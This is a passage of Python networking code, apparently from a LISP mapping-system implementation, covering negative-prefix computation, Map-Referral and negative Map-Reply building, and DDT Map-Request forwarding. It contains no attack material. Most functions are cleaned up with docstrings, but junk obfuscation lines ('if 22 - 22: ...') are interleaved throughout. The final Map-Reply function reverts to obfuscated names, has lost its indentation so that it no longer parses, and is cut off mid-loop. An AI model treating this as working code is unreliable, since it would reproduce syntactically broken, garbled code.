    diff = eid.hash_address(entry_prefix)
    address_bits = eid.addr_length() * 8

    #
    # Scan from the most-significant bit for the first difference.  When
    # the addresses are identical the index ends at the last bit position.
    #
    bit_index = 0
    for bit_index in range(address_bits):
        if (diff & (1 << (address_bits - bit_index - 1))): break
    #endfor

    if (bit_index > neg_prefix.mask_len): neg_prefix.mask_len = bit_index
    return
if 22 - 22: I1ii11iIi11i * OoooooooOO
if 22 - 22: II111iiii . Ii1I + iIii1I11I1II1
if 91 - 91: II111iiii / iIii1I11I1II1 / OoOoOO00 . II111iiii
if 58 - 58: OoOoOO00 - II111iiii
if 77 - 77: I1ii11iIi11i
if 72 - 72: I1IiiI - i1IIi
if 11 - 11: iIii1I11I1II1 . OoO0O00 * Ii1I
if 65 - 65: Oo0Ooo / OoooooooOO
if 60 - 60: II111iiii + I1IiiI % oO0o - o0oOOo0O0Ooo
if 50 - 50: iIii1I11I1II1 - i11iIiiIii / iII111i + ooOoO0o / OOooOOo
def lisp_neg_prefix_walk(entry, parms):
    """
    Cache-walk callback used when computing a negative prefix.

    'parms' is (eid, auth_prefix, neg_prefix).  Entries outside the
    search scope -- different instance-id or AFI when no auth-prefix is
    supplied, or not more-specific than the auth-prefix -- are skipped.
    Matching entries widen neg_prefix via lisp_find_negative_mask_len().
    Always returns [True, parms] so the walk continues.
    """
    eid, auth_prefix, neg_prefix = parms

    if (auth_prefix == None):
        #
        # No auth-prefix: only consider entries with the lookup EID's
        # instance-id and address family.
        #
        if (entry.eid.instance_id != eid.instance_id):
            return([True, parms])
        #endif
        if (entry.eid.afi != eid.afi): return([True, parms])
    elif (entry.eid.is_more_specific(auth_prefix) == False):
        #
        # Entry not covered by the auth-prefix -- skip it.
        #
        return([True, parms])
    #endif

    #
    # This entry is in scope; let it widen the negative prefix.
    #
    lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
    return([True, parms])
if 9 - 9: Oo0Ooo . i1IIi - i1IIi + I1Ii111 * ooOoO0o . I1ii11iIi11i
if 17 - 17: I11i * I1ii11iIi11i % I1IiiI + OoO0O00 + IiII
if 90 - 90: OoooooooOO - I1IiiI / I1ii11iIi11i + oO0o - o0oOOo0O0Ooo
if 84 - 84: OoOoOO00 + O0 % Oo0Ooo
if 22 - 22: iIii1I11I1II1 % i11iIiiIii
if 29 - 29: ooOoO0o - iII111i + IiII % Ii1I - oO0o - ooOoO0o
if 43 - 43: oO0o
if 22 - 22: I1Ii111 + i11iIiiIii
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
    """
    Compute the least-specific prefix covering 'eid' that does not
    collide with any delegation in 'cache', bounded by the DDT entry's
    authoritative prefix.  Non-binary EIDs (e.g. distinguished names)
    are returned unchanged.
    """
    if (eid.is_binary() == False): return(eid)

    #
    # Start from a zero-length copy of the EID; the cache walk widens the
    # mask just enough to avoid every cached delegation.
    #
    neg_prefix = lisp_address(eid.afi, "", 0, 0)
    neg_prefix.copy_address(eid)
    neg_prefix.mask_len = 0

    auth_prefix_str = ddt_entry.print_eid_tuple()
    auth_prefix = ddt_entry.eid

    #
    # Walk the supplied cache to find the shortest usable mask length.
    #
    eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
        (eid, auth_prefix, neg_prefix))

    #
    # Zero the host bits beyond the computed mask length.
    #
    neg_prefix.mask_address(neg_prefix.mask_len)

    lprint(("Least specific prefix computed from ddt-cache for EID {} " +
        "using auth-prefix {} is {}").format(green(eid.print_address(),
        False), auth_prefix_str, neg_prefix.print_prefix()))
    return(neg_prefix)
if 42 - 42: OoOoOO00 % I1IiiI * Oo0Ooo * II111iiii + O0 - II111iiii
if 97 - 97: I1IiiI
if 87 - 87: I11i + iIii1I11I1II1
if 91 - 91: oO0o
if 58 - 58: i11iIiiIii / Ii1I - OoooooooOO
if 25 - 25: i1IIi * ooOoO0o % OOooOOo / I1IiiI
if 75 - 75: i11iIiiIii
if 38 - 38: iIii1I11I1II1
def lisp_ms_compute_neg_prefix ( eid , group ) :
    """Compute negative EID and group prefixes from the Map-Server caches.

    Returns a 3-element list [neg-eid-prefix, neg-group-prefix, action]
    where action is LISP_DDT_ACTION_DELEGATION_HOLE when an authoritative
    prefix covers the request and LISP_DDT_ACTION_NOT_AUTH otherwise.
    """
    # Start both negative prefixes as 0-length copies of the targets.
    neg_prefix = lisp_address ( eid . afi , "" , 0 , 0 )
    neg_prefix . copy_address ( eid )
    neg_prefix . mask_len = 0

    group_neg_prefix = lisp_address ( group . afi , "" , 0 , 0 )
    group_neg_prefix . copy_address ( group )
    group_neg_prefix . mask_len = 0

    auth_prefix = None

    if ( group . is_null ( ) ) :
        # Unicast lookup — key the ddt-cache on the EID.
        ddt_entry = lisp_ddt_cache . lookup_cache ( eid , False )
        if ( ddt_entry == None ) :
            # Not authoritative at all — return host-route negatives.
            neg_prefix . mask_len = neg_prefix . host_mask_len ( )
            group_neg_prefix . mask_len = group_neg_prefix . host_mask_len ( )
            return ( [ neg_prefix , group_neg_prefix , LISP_DDT_ACTION_NOT_AUTH ] )

        cache = lisp_sites_by_eid
        if ( ddt_entry . is_auth_prefix ( ) ) : auth_prefix = ddt_entry . eid
    else :
        # Multicast lookup — key the ddt-cache on the group.
        ddt_entry = lisp_ddt_cache . lookup_cache ( group , False )
        if ( ddt_entry == None ) :
            neg_prefix . mask_len = neg_prefix . host_mask_len ( )
            group_neg_prefix . mask_len = group_neg_prefix . host_mask_len ( )
            return ( [ neg_prefix , group_neg_prefix , LISP_DDT_ACTION_NOT_AUTH ] )

        if ( ddt_entry . is_auth_prefix ( ) ) : auth_prefix = ddt_entry . group

        # Compute the group negative prefix from the site cache.
        group , auth_prefix , group_neg_prefix = lisp_sites_by_eid . walk_cache ( lisp_neg_prefix_walk , ( group , auth_prefix , group_neg_prefix ) )
        group_neg_prefix . mask_address ( group_neg_prefix . mask_len )

        lprint ( ( "Least specific prefix computed from site-cache for " + "group EID {} using auth-prefix {} is {}" ) . format ( group . print_address ( ) , auth_prefix . print_prefix ( ) if ( auth_prefix != None ) else "'not found'" ,
            group_neg_prefix . print_prefix ( ) ) )

        # Source lookups for (S,G) walk this entry's source-cache.
        cache = ddt_entry . source_cache

    # Authoritative but unregistered -> delegation hole; else not-auth.
    action = LISP_DDT_ACTION_DELEGATION_HOLE if ( auth_prefix != None ) else LISP_DDT_ACTION_NOT_AUTH

    # Compute the EID negative prefix from the chosen cache.
    eid , auth_prefix , neg_prefix = cache . walk_cache ( lisp_neg_prefix_walk ,
        ( eid , auth_prefix , neg_prefix ) )
    neg_prefix . mask_address ( neg_prefix . mask_len )

    lprint ( ( "Least specific prefix computed from site-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
        auth_prefix . print_prefix ( ) if ( auth_prefix != None ) else "'not found'" , neg_prefix . print_prefix ( ) ) )

    return ( [ neg_prefix , group_neg_prefix , action ] )
if 39 - 39: I1Ii111 - I1IiiI
if 18 - 18: i1IIi
if 42 - 42: II111iiii - i1IIi . oO0o % OOooOOo % ooOoO0o - i11iIiiIii
if 23 - 23: OOooOOo + iIii1I11I1II1 - i1IIi
if 72 - 72: OOooOOo . I1IiiI * O0 + i11iIiiIii - iII111i
if 79 - 79: o0oOOo0O0Ooo + I1ii11iIi11i
if 46 - 46: I11i
if 78 - 78: IiII / II111iiii
def lisp_ms_send_map_referral ( lisp_sockets , map_request , ecm_source , port ,
    action , eid_prefix , group_prefix ) :
    """Build and send a Map-Referral in response to a DDT Map-Request.

    Encodes one EID-record carrying 'action' and the delegation-set (if any)
    from the ddt-cache, then sends it back to 'ecm_source'.

    Fix: the original code only assigned the record TTL for a subset of
    actions (MS_ACK, SITE_NOT_FOUND, MS_NOT_REG, DELEGATION_HOLE, NOT_AUTH),
    so any other action value raised UnboundLocalError when the TTL was
    stored in the EID-record.  A default TTL of 1440 (minutes) is now set up
    front; every previously handled action still overrides it, so behavior
    on all existing paths is unchanged.
    """
    eid = map_request . target_eid
    group = map_request . target_group
    nonce = map_request . nonce

    # Default record TTL; prevents UnboundLocalError for unhandled actions.
    ttl = 1440
    if ( action == LISP_DDT_ACTION_MS_ACK ) : ttl = 1440

    #
    # Build the Map-Referral header (one EID-record follows).
    #
    map_referral = lisp_map_referral ( )
    map_referral . record_count = 1
    map_referral . nonce = nonce
    packet = map_referral . encode ( )
    map_referral . print_map_referral ( )

    incomplete = False

    #
    # When no site matched, compute the negative prefix to referral and
    # possibly downgrade the action.
    #
    if ( action == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
        eid_prefix , group_prefix , action = lisp_ms_compute_neg_prefix ( eid ,
            group )
        ttl = 15

    if ( action == LISP_DDT_ACTION_MS_NOT_REG ) : ttl = 1
    if ( action == LISP_DDT_ACTION_MS_ACK ) : ttl = 1440
    if ( action == LISP_DDT_ACTION_DELEGATION_HOLE ) : ttl = 15
    if ( action == LISP_DDT_ACTION_NOT_AUTH ) : ttl = 0

    #
    # Pull the delegation-set for this EID from the ddt-cache, if present.
    #
    is_ms_peer = False
    referral_count = 0
    ddt_entry = lisp_ddt_cache_lookup ( eid , group , False )
    if ( ddt_entry != None ) :
        referral_count = len ( ddt_entry . delegation_set )
        is_ms_peer = ddt_entry . is_ms_peer_entry ( )
        ddt_entry . map_referrals_sent += 1

    #
    # Decide the ddt-incomplete bit: always set when not authoritative, and
    # for MS referrals/acks when the entry is not an ms-peer.
    #
    if ( action == LISP_DDT_ACTION_NOT_AUTH ) : incomplete = True
    if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
        incomplete = ( is_ms_peer == False )

    #
    # Encode the single EID-record.
    #
    eid_record = lisp_eid_record ( )
    eid_record . rloc_count = referral_count
    eid_record . authoritative = True
    eid_record . action = action
    eid_record . ddt_incomplete = incomplete
    eid_record . eid = eid_prefix
    eid_record . group = group_prefix
    eid_record . record_ttl = ttl

    packet += eid_record . encode ( )
    eid_record . print_record ( " " , True )

    #
    # Encode one RLOC-record per delegate in the delegation-set.
    #
    if ( referral_count != 0 ) :
        for delegate in ddt_entry . delegation_set :
            rloc_record = lisp_rloc_record ( )
            rloc_record . rloc = delegate . delegate_address
            rloc_record . priority = delegate . priority
            rloc_record . weight = delegate . weight
            rloc_record . mpriority = 255
            rloc_record . mweight = 0
            rloc_record . reach_bit = True
            packet += rloc_record . encode ( )
            rloc_record . print_record ( " " )

    #
    # A non-zero nonce means the request came over the control port.
    #
    if ( map_request . nonce != 0 ) : port = LISP_CTRL_PORT
    lisp_send_map_referral ( lisp_sockets , packet , ecm_source , port )
    return
if 2 - 2: OoOoOO00 + I1ii11iIi11i + oO0o
if 27 - 27: OoooooooOO - Ii1I / OoooooooOO + OoO0O00
if 58 - 58: OOooOOo * I11i . I1IiiI
if 46 - 46: I11i + II111iiii * iII111i % ooOoO0o - I1IiiI
if 73 - 73: I1ii11iIi11i * iIii1I11I1II1 . I1Ii111 - Ii1I
if 11 - 11: I11i
if 48 - 48: IiII / O0
if 46 - 46: ooOoO0o + oO0o
def lisp_send_negative_map_reply ( sockets , eid , group , nonce , dest , port , ttl ,
    xtr_id , pubsub ) :
    """Build and send a negative Map-Reply (no RLOC-records) for an EID.

    The action is native-forward for unicast EIDs and drop for (S,G)
    entries; crypto-hashed EIDs get send-map-request instead.  When
    'pubsub' is set the reply is registered as a subscription rather
    than sent directly.
    """
    lprint ( "Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}" . format ( lisp_print_eid_tuple ( eid , group ) , lisp_hex_string ( nonce ) ,
        red ( dest . print_address ( ) , False ) ) )

    # Unicast misses natively forward; multicast misses drop.
    if group . is_null ( ) :
        action = LISP_NATIVE_FORWARD_ACTION
    else :
        action = LISP_DROP_ACTION

    # EIDs carrying a crypto-hash must trigger a Map-Request instead.
    if ( lisp_get_eid_hash ( eid ) != None ) :
        action = LISP_SEND_MAP_REQUEST_ACTION

    packet = lisp_build_map_reply ( eid , group , [ ] , nonce , action , ttl , False ,
        None , False , False )

    if ( pubsub ) :
        # Register the subscription instead of replying directly.
        lisp_process_pubsub ( sockets , packet , eid , dest , port , nonce , ttl ,
            xtr_id )
    else :
        lisp_send_map_reply ( sockets , packet , dest , port )
    return
if 67 - 67: ooOoO0o . Ii1I - Oo0Ooo * iII111i . I11i - OOooOOo
if 10 - 10: I11i
if 37 - 37: o0oOOo0O0Ooo / I1IiiI * oO0o / II111iiii
if 39 - 39: IiII - i1IIi - IiII - OoooooooOO - I1ii11iIi11i
if 66 - 66: IiII + i1IIi
if 21 - 21: IiII / i11iIiiIii / OoOoOO00
if 75 - 75: Ii1I . i1IIi / I1IiiI * iII111i . IiII / OoOoOO00
def lisp_retransmit_ddt_map_request ( mr ) :
    """Retransmit a queued DDT Map-Request and re-arm its retry timer.

    Charges a no-response against the referral-node the last attempt was
    sent to, gives up (dequeues) after LISP_MAX_MAP_NOTIFY_RETRIES tries,
    otherwise resends and schedules the next retry.

    Fix: replaced referral_set.has_key(key) with "key in referral_set" —
    dict.has_key() was removed in Python 3 and the membership operator is
    equivalent (and preferred) in Python 2 as well.
    """
    source_str = mr . mr_source . print_address ( )
    eid_str = mr . print_eid_tuple ( )
    nonce = mr . nonce

    #
    # Count a non-response against the referral-node we last queried so
    # unresponsive nodes can be avoided.
    #
    if ( mr . last_request_sent_to ) :
        node_addr = mr . last_request_sent_to . print_address ( )
        referral = lisp_referral_cache_lookup ( mr . last_cached_prefix [ 0 ] ,
            mr . last_cached_prefix [ 1 ] , True )
        if ( referral and node_addr in referral . referral_set ) :
            referral . referral_set [ node_addr ] . no_responses += 1

    #
    # Give up after the retry limit and remove the queue entry.
    #
    if ( mr . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
        lprint ( "DDT Map-Request retry limit reached for EID {}, nonce 0x{}" . format ( green ( eid_str , False ) , lisp_hex_string ( nonce ) ) )
        mr . dequeue_map_request ( )
        return

    mr . retry_count += 1

    src = green ( source_str , False )
    dst = green ( eid_str , False )
    lprint ( "Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( bold ( "Map-Request" , False ) , "P" if mr . from_pitr else "" ,
        red ( mr . itr . print_address ( ) , False ) , src , dst ,
        lisp_hex_string ( nonce ) ) )

    #
    # Resend (not to root) and schedule the next retry.
    #
    lisp_send_ddt_map_request ( mr , False )

    mr . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
        lisp_retransmit_ddt_map_request , [ mr ] )
    mr . retransmit_timer . start ( )
    return
if 38 - 38: I1ii11iIi11i + I1Ii111 * I11i / OoO0O00 + o0oOOo0O0Ooo
if 46 - 46: iII111i
if 56 - 56: Oo0Ooo / II111iiii
if 61 - 61: Ii1I - i1IIi / ooOoO0o - Oo0Ooo / IiII % Oo0Ooo
if 53 - 53: OoooooooOO + iII111i % II111iiii * IiII
if 10 - 10: OoOoOO00 % I11i
if 46 - 46: i1IIi % IiII
if 45 - 45: I1ii11iIi11i / I1ii11iIi11i - OoO0O00
def lisp_get_referral_node ( referral , source_eid , dest_eid ) :
    """Pick one usable referral-node from a referral entry.

    Collects all up referral-nodes of the best (numerically lowest)
    priority, then hashes (source-EID, dest-EID) to load-split across
    them.  Returns None when no node is up.
    """
    # Gather every "up" node whose priority ties the best seen so far;
    # a strictly better (lower) priority resets the candidate list.
    candidates = [ ]
    for node in referral . referral_set . values ( ) :
        if ( node . updown == False ) : continue
        if ( not candidates or candidates [ 0 ] . priority == node . priority ) :
            candidates . append ( node )
        elif ( candidates [ 0 ] . priority > node . priority ) :
            candidates = [ node ]

    how_many = len ( candidates )
    if ( how_many == 0 ) : return ( None )

    # Deterministic spread across equal-priority nodes.
    index = dest_eid . hash_address ( source_eid ) % how_many
    return ( candidates [ index ] )
if 78 - 78: I11i / Ii1I . IiII / o0oOOo0O0Ooo / OoO0O00 + OoOoOO00
if 50 - 50: Ii1I
if 84 - 84: iII111i % II111iiii
if 31 - 31: I11i
if 28 - 28: i11iIiiIii + IiII / I11i . Ii1I / OoO0O00
if 100 - 100: o0oOOo0O0Ooo - I11i . o0oOOo0O0Ooo
if 90 - 90: OoOoOO00 / II111iiii / I11i * I11i - iIii1I11I1II1
def lisp_send_ddt_map_request ( mr , send_to_root ) :
    """Forward a queued Map-Request into the DDT hierarchy.

    Looks up the best referral-cache entry for the request's EID (or the
    root when 'send_to_root' is set), picks a referral-node, and ECMs the
    original Map-Request to it.  Sends a negative Map-Reply back to the
    ITR when no referral or no reachable node exists.  Gives up entirely
    after 8 sends.
    """
    sockets = mr . lisp_sockets
    nonce = mr . nonce
    itr = mr . itr
    source = mr . mr_source
    eid_str = mr . print_eid_tuple ( )

    #
    # Hard cap on how many times one queue entry may be sent.
    #
    if ( mr . send_count == 8 ) :
        lprint ( "Giving up on map-request-queue entry {}, nonce 0x{}" . format ( green ( eid_str , False ) , lisp_hex_string ( nonce ) ) )
        mr . dequeue_map_request ( )
        return

    #
    # Either jump to the DDT root (AFI-none matches the root entry) or
    # look up the request's own EID/group.
    #
    if ( send_to_root ) :
        lookup_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
        lookup_group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
        mr . tried_root = True
        lprint ( "Jumping up to root for EID {}" . format ( green ( eid_str , False ) ) )
    else :
        lookup_eid = mr . eid
        lookup_group = mr . group

    referral = lisp_referral_cache_lookup ( lookup_eid , lookup_group , False )
    if ( referral == None ) :
        lprint ( "No referral cache entry found" )
        lisp_send_negative_map_reply ( sockets , lookup_eid , lookup_group ,
            nonce , itr , mr . sport , 15 , None , False )
        return

    referral_str = referral . print_eid_tuple ( )
    lprint ( "Found referral cache entry {}, referral-type: {}" . format ( referral_str ,
        referral . print_referral_type ( ) ) )

    node = lisp_get_referral_node ( referral , source , mr . eid )
    if ( node == None ) :
        lprint ( "No reachable referral-nodes found" )
        mr . dequeue_map_request ( )
        lisp_send_negative_map_reply ( sockets , referral . eid ,
            referral . group , nonce , itr , mr . sport , 1 , None , False )
        return

    lprint ( "Send DDT Map-Request to {} {} for EID {}, nonce 0x{}" . format ( node . referral_address . print_address ( ) ,
        referral . print_referral_type ( ) , green ( eid_str , False ) ,
        lisp_hex_string ( nonce ) ) )

    #
    # MS referrals/acks are addressed to a Map-Server inside the ECM.
    #
    to_ms = ( referral . referral_type == LISP_DDT_ACTION_MS_REFERRAL or
        referral . referral_type == LISP_DDT_ACTION_MS_ACK )
    lisp_send_ecm ( sockets , mr . packet , source , mr . sport , mr . eid ,
        node . referral_address , to_ms = to_ms , ddt = True )

    #
    # Record where/when we sent so retransmits can charge non-responses.
    #
    mr . last_request_sent_to = node . referral_address
    mr . last_sent = lisp_get_timestamp ( )
    mr . send_count += 1
    node . map_requests_sent += 1
    return
if 30 - 30: OoO0O00 + o0oOOo0O0Ooo / iIii1I11I1II1
if 69 - 69: IiII - OoooooooOO + iII111i + iII111i - Ii1I
if 27 - 27: I1ii11iIi11i % Oo0Ooo * iIii1I11I1II1 * O0 / I11i * Oo0Ooo
if 97 - 97: IiII % Oo0Ooo % OoOoOO00
if 87 - 87: i11iIiiIii . oO0o * I1IiiI * I1Ii111
if 57 - 57: iIii1I11I1II1 / i11iIiiIii / IiII + I1ii11iIi11i % I1IiiI
if 80 - 80: iIii1I11I1II1
if 23 - 23: II111iiii . ooOoO0o % I1Ii111
def lisp_mr_process_map_request ( lisp_sockets , packet , map_request , ecm_source ,
    sport , mr_source ) :
    """Map-Resolver handling of a received Map-Request.

    Queues the request on the DDT map-request queue and kicks off the
    first DDT lookup toward the hierarchy.
    """
    target_eid = map_request . target_eid
    target_group = map_request . target_group
    deid_str = map_request . print_eid_tuple ( )
    seid_str = mr_source . print_address ( )
    nonce = map_request . nonce

    lprint ( "Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( "P" if map_request . pitr_bit else "" ,
        red ( ecm_source . print_address ( ) , False ) , green ( seid_str , False ) ,
        green ( deid_str , False ) , lisp_hex_string ( nonce ) ) )

    #
    # Build queue entry and remember request context for retries/replies.
    #
    queued = lisp_ddt_map_request ( lisp_sockets , packet , target_eid , target_group , nonce )
    queued . packet = packet
    queued . itr = ecm_source
    queued . mr_source = mr_source
    queued . sport = sport
    queued . from_pitr = map_request . pitr_bit
    queued . queue_map_request ( )

    lisp_send_ddt_map_request ( queued , False )
    return
if 30 - 30: I11i . I1ii11iIi11i - i1IIi / i1IIi + IiII . oO0o
if 70 - 70: i1IIi . I11i * o0oOOo0O0Ooo . iII111i
if 75 - 75: oO0o * OoO0O00 * I11i + oO0o + O0 . I1Ii111
if 8 - 8: I1ii11iIi11i / i1IIi - I1ii11iIi11i + Ii1I + OoO0O00 - I11i
if 79 - 79: OoooooooOO - I1Ii111 * I1IiiI . I1Ii111 - iIii1I11I1II1
if 27 - 27: OoOoOO00 % OoOoOO00 % II111iiii
if 45 - 45: iIii1I11I1II1 . o0oOOo0O0Ooo % I1IiiI
def lisp_process_map_request ( lisp_sockets , packet , ecm_source , ecm_port ,
    mr_source , mr_port , ddt_request , ttl ) :
    """Decode a Map-Request and dispatch by request flags and node role.

    RLOC-probes are handled and returned early; SMR and SMR-invoked bits
    are processed in-line; then the request is handed to whichever of the
    ETR / Map-Server / Map-Resolver / DDT-node roles this process plays.
    """
    saved_packet = packet
    map_request = lisp_map_request ( )
    packet = map_request . decode ( packet , mr_source , mr_port )
    if ( packet == None ) :
        lprint ( "Could not decode Map-Request packet" )
        return

    map_request . print_map_request ( )

    #
    # RLOC-probes take a dedicated path; nothing else to do afterwards.
    #
    if ( map_request . rloc_probe ) :
        lisp_process_rloc_probe_request ( lisp_sockets , map_request ,
            mr_source , mr_port , ttl )
        return

    #
    # Solicit-Map-Request handling (both directions).
    #
    if ( map_request . smr_bit ) :
        lisp_process_smr ( map_request )
    if ( map_request . smr_invoked_bit ) :
        lisp_process_smr_invoked_request ( map_request )

    #
    # ETR role answers for its own registered EIDs.
    #
    if ( lisp_i_am_etr ) :
        lisp_etr_process_map_request ( lisp_sockets , map_request , mr_source ,
            mr_port , ttl )

    #
    # Map-Server role; may also emit a Map-Referral for DDT requests.
    #
    if ( lisp_i_am_ms ) :
        packet = saved_packet
        eid , group , ddt_action = lisp_ms_process_map_request ( lisp_sockets ,
            saved_packet , map_request , mr_source , mr_port , ecm_source )
        if ( ddt_request ) :
            lisp_ms_send_map_referral ( lisp_sockets , map_request , ecm_source ,
                ecm_port , ddt_action , eid , group )
        return

    #
    # Map-Resolver role (only for non-DDT requests).
    #
    if ( lisp_i_am_mr and not ddt_request ) :
        lisp_mr_process_map_request ( lisp_sockets , saved_packet , map_request ,
            ecm_source , mr_port , mr_source )

    #
    # DDT-node role, or a DDT request hitting a non-MS node.
    #
    if ( lisp_i_am_ddt or ddt_request ) :
        packet = saved_packet
        lisp_ddt_process_map_request ( lisp_sockets , map_request , ecm_source ,
            ecm_port )
    return
if 77 - 77: OoooooooOO * Ii1I * iIii1I11I1II1 + IiII
if 53 - 53: IiII + I1Ii111 + oO0o
if 31 - 31: OOooOOo + OoOoOO00 * OOooOOo + OoOoOO00 / o0oOOo0O0Ooo . iIii1I11I1II1
if 1 - 1: I1Ii111 * i11iIiiIii % I1Ii111 - OoO0O00 + I1Ii111 / Oo0Ooo
if 3 - 3: OOooOOo - i11iIiiIii / I1Ii111 . OOooOOo - OoO0O00
if 60 - 60: OoOoOO00 / i1IIi . Ii1I - OoO0O00 - OoooooooOO
if 39 - 39: I1IiiI + i1IIi * OoO0O00 % I11i
if 41 - 41: I1ii11iIi11i * IiII
def lisp_store_mr_stats ( source , nonce ) :
    """Record negative Map-Reply statistics for the map-resolver 'source'.

    Bumps the reply counter, stamps the reply time, and folds an RTT
    sample into total_rtt when the reply's nonce matches the nonce of the
    last request sent.  The RTT accumulator is reset every 100 replies
    and the stored nonce every 10 replies.
    """
    resolver = lisp_get_map_resolver ( source , None )
    if ( resolver == None ) : return

    resolver . neg_map_replies_received += 1
    resolver . last_reply = lisp_get_timestamp ( )

    # Restart the RTT accumulation window every 100 replies.
    if ( ( resolver . neg_map_replies_received % 100 ) == 0 ) :
        resolver . total_rtt = 0

    # Matching nonce means this reply answers our last request — take an
    # RTT sample and consume the nonce.
    if ( resolver . last_nonce == nonce ) :
        resolver . total_rtt += ( time . time ( ) - resolver . last_used )
        resolver . last_nonce = 0

    # Periodically clear a stale nonce so a lost reply can't wedge RTT
    # sampling forever.
    if ( ( resolver . neg_map_replies_received % 10 ) == 0 ) :
        resolver . last_nonce = 0
    return
if 41 - 41: Ii1I + IiII
if 37 - 37: I1Ii111 / o0oOOo0O0Ooo - ooOoO0o - OoooooooOO . I1ii11iIi11i % I1Ii111
if 53 - 53: I1IiiI % OOooOOo + Ii1I - Ii1I
if 99 - 99: i1IIi * OoOoOO00 - i1IIi
if 65 - 65: OoO0O00 / i11iIiiIii + I1ii11iIi11i + OoOoOO00
if 82 - 82: Ii1I * OOooOOo % ooOoO0o / OoO0O00 - Oo0Ooo . I1Ii111
if 90 - 90: I11i * i11iIiiIii % i1IIi + I1Ii111 / OoO0O00
def lisp_process_map_reply ( lisp_sockets , packet , source , ttl ) :
global lisp_map_cache
if 15 - 15: Oo0Ooo + oO0o . I11i % OoO0O00
IiIIIi = lisp_map_reply ( )
packet = IiIIIi . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Reply packet" )
return
if 13 - 13: I1ii11iIi11i / ooOoO0o * I1Ii111
IiIIIi . print_map_reply ( )
if 45 - 45: I1ii11iIi11i - I11i
if 60 - 60: OOooOOo - OOooOOo * OoOoOO00 / Ii1I % iII111i % Oo0Ooo
if 75 - 75: iIii1I11I1II1 - IiII - I1Ii111
if 4 - 4: i11iIiiIii % OoooooooOO . i11iIiiIii
ooiIi1 = None
for IiIIi1IiiIiI in range ( IiIIIi . record_count ) :
iiI = lisp_eid_record ( )
packet = iiI . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Reply packet" )
return
if 49 - 49: i1IIi * iII111i - iIii1I11I1II1 % I11i * O0 / OoOoOO00
iiI . print_record ( " " , False )
if 48 - 48: IiII
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii - OOooOOo - o0oOOo0O0Ooo
if 98 - 98: o0oOOo0O0Ooo * OoO0O00 . OoooooooOO
if 40 - 40: I1Ii111 + Oo0Ooo + I1Ii111
if 57 - 57: I1Ii111 / II111iiii % iII111i
if ( iiI . rloc_count == 0 ) :
lisp_store_mr_stats ( source , IiIIIi . nonce )
if 32 - 32: IiII - OOooOOo + i11iIiiIii + I1IiiI . iII111i
if 75 - 75: o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1IiiI / OoO0O00
iIIiI = ( iiI . group . is_null ( ) == False )
if 16 - 16: II111iiii . Ii1I + I1Ii111 % i1IIi / i11iIiiIii + OOooOOo
if 43 - 43: I1IiiI . Oo0Ooo + i1IIi + I11i / OoO0O00
if 66 - 66: i11iIiiIii
if 83 - 83: I1Ii111 / iIii1I11I1II1 - oO0o
if 3 - 3: OOooOOo - Oo0Ooo * I1IiiI - OoO0O00 / OOooOOo + IiII
if ( lisp_decent_push_configured ) :
OOo000 = iiI . action
if ( iIIiI and OOo000 == LISP_DROP_ACTION ) :
if ( iiI . eid . is_local ( ) ) : continue
if 83 - 83: i1IIi * i1IIi - II111iiii / OoooooooOO . Ii1I + I1Ii111
if 10 - 10: I11i
if 24 - 24: Ii1I
if 30 - 30: II111iiii / Ii1I - I11i - OoO0O00
if 25 - 25: I11i % i1IIi / I11i * i11iIiiIii
if 71 - 71: IiII % I11i - OoooooooOO + I1IiiI / Oo0Ooo % I11i
if 6 - 6: i1IIi * i11iIiiIii + ooOoO0o - IiII
if ( iiI . eid . is_null ( ) ) : continue
if 97 - 97: iIii1I11I1II1 * i1IIi * II111iiii - OOooOOo - Oo0Ooo - iIii1I11I1II1
if 26 - 26: ooOoO0o + Oo0Ooo
if 24 - 24: I1IiiI
if 43 - 43: OoO0O00
if 51 - 51: OoooooooOO % IiII % Oo0Ooo
if ( iIIiI ) :
IiiiiII1i = lisp_map_cache_lookup ( iiI . eid , iiI . group )
else :
IiiiiII1i = lisp_map_cache . lookup_cache ( iiI . eid , True )
if 91 - 91: I1IiiI . I1Ii111 + II111iiii . Oo0Ooo
o0O0o0oooo00 = ( IiiiiII1i == None )
if 51 - 51: Ii1I - II111iiii % II111iiii * OOooOOo
if 84 - 84: i1IIi . OoOoOO00 % I1ii11iIi11i . OoO0O00 + i11iIiiIii
if 19 - 19: i1IIi / I1IiiI + IiII . iII111i
if 68 - 68: iII111i
if 29 - 29: II111iiii / II111iiii % OoO0O00 % Oo0Ooo . II111iiii
if ( IiiiiII1i == None ) :
ii1iI1 , O0o000 , o00oo0 = lisp_allow_gleaning ( iiI . eid , iiI . group ,
None )
if ( ii1iI1 ) : continue
else :
if ( IiiiiII1i . gleaned ) : continue
if 87 - 87: i11iIiiIii . II111iiii % iIii1I11I1II1
if 97 - 97: OoOoOO00 . OoO0O00 . o0oOOo0O0Ooo
if 64 - 64: IiII / OOooOOo * OoOoOO00 + OoooooooOO
if 19 - 19: OoooooooOO % oO0o
if 49 - 49: i1IIi % OoooooooOO + OoooooooOO / OoO0O00 + OoO0O00 * II111iiii
ooo0oo = [ ]
for oOoOoO0O in range ( iiI . rloc_count ) :
iIii1IiIiI = lisp_rloc_record ( )
iIii1IiIiI . keys = IiIIIi . keys
packet = iIii1IiIiI . decode ( packet , IiIIIi . nonce )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Reply packet" )
return
if 46 - 46: ooOoO0o % II111iiii
iIii1IiIiI . print_record ( " " )
